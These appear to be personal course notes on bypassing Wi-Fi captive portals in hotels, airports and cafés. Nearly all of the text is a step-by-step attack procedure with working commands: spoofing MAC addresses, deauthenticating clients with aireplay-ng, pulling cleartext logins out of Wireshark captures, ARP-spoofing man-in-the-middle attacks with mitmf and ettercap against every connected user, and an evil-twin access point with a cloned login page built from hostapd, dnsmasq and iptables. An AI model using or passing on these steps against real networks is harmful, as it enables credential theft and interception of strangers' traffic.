- Widely used in hotels, airports, coffee shops
- Allows users to access internet after logging in
- Users log in using a web interface
How to bypass open captive portals §
- Change MAC address to one of the connected devices
- Sniff logins in monitor mode
- run airodump-ng wlan0 to get the MAC address and channel
- run airodump-ng —bssid 00:25:F0:77:0D:FC —channel 11 —write test wlan0
- deauthenticate a client by running aireplay-ng -0 1 -a 00:25:F0:77:0D:FC -c 11:11:11:11:11:11 wlan0
- run wireshark
- File > Open > test-01.cap
- filter by “http”
- Look for a POST request under the “info” column
- Expand “HTML Form Url Encoded: …”
- keep expanding until you fins the user/pass in clear text
- Connect and sniff logins after running an arp spoofing attack
- Data sent to/fm router including passwords will be directed to us
- This is a MITM attack
- We don’t need to deauth them since the targets will go through us and since we do not have internet access they will be disconnected
- mitmf —arp —spoof -i wlan0 —gateway
- you can get the gateway using “route -n”
- This will make you the man in the middle
- ettercap -Tq -M arp:remote -i wlan0 ///
- another tool to do MITM
- Tq means run in Text mode quiet
- /// means we want to target all connected users
- Both of the tools above will capture the credentials for you and print them to the terminal
- Create a fake AP and ask users to log on
- Clone the captive portal page
- Make sure the form is basic html
- Create fake AP with the same name or similar name
- Deauth users from real network so they log into our evil twin
Main components of wifi networks: §
- A router broadcasting a signal > use wifi card with hostapd
- A DHCP server to give IPs to clients > use dnsmasq
- A DNS server to handle dns requests > use dnsmasq
Install dnsmasq and hostapd §
- apt-get install dnsmasq
- apt-get install hostapd
setup: §
- Make sure you Alfa card is plusgged in
- systemctl stop NetworkManager.service
- systemctl stop wpa_supplicant.service
- run the commands below (bash ./flushiptables.sh)
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
To run dnsmasq and hostapd: §
- dnsmasq -C /root/Downloads/fake-ap/dnsmasq.conf
- hostapd /root/Downloads/fake-ap/hostapd.conf -B
- -B is so that it executes in the background
We need to make our default gateway §
- route add default gw
- check by running route -n (delete any others on wlan0)
Now we need to set up ip number on wireless adapter §
- ifconfig wlan0 netmask
Start your captive portal server §
Try to make you captive portal use https: §
- generate an https certificate
- openssl req -new -x509 - days 365 /root/downloads/cert.pem -keyout /root/downloads/cert.key
Ways to sniff the user/pass §
- tshark -i wlan0 -w test.cap
- open wireshark, open the test.cap file, look for http/post packets
Reset ip tables after you are all done §
if you need to stop dnsmaq §
- ss -lp “sport = :domain”
- kill -9#####
to stop everything: §
service hostapd stop
service dnsmasq stop
service apache2 stop
service rpcbind stop
killall dnsmasq
killall hostapd
systemctl start NetworkManager.service
systemctl start wpa_supplicant.service
follow this guys steps §